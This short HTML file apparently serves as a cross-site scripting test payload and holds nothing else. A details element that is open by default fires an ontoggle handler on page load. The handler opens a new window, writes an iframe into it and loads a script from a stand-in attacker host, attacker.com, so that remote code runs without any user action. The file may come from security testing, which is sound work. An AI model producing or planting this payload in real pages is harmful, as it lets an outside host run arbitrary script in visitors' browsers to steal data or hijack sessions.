<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<details ontoggle="w=window.open('about:blank'); w.document.write('<iframe id=GGGPrjxvGGG src=about:blank><\/iframe><script>GGGPrjxvGGG.addEventListener(\x22load\x22,()=>{GGGPrjxvGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');" open>test</details>
</body>
</html>
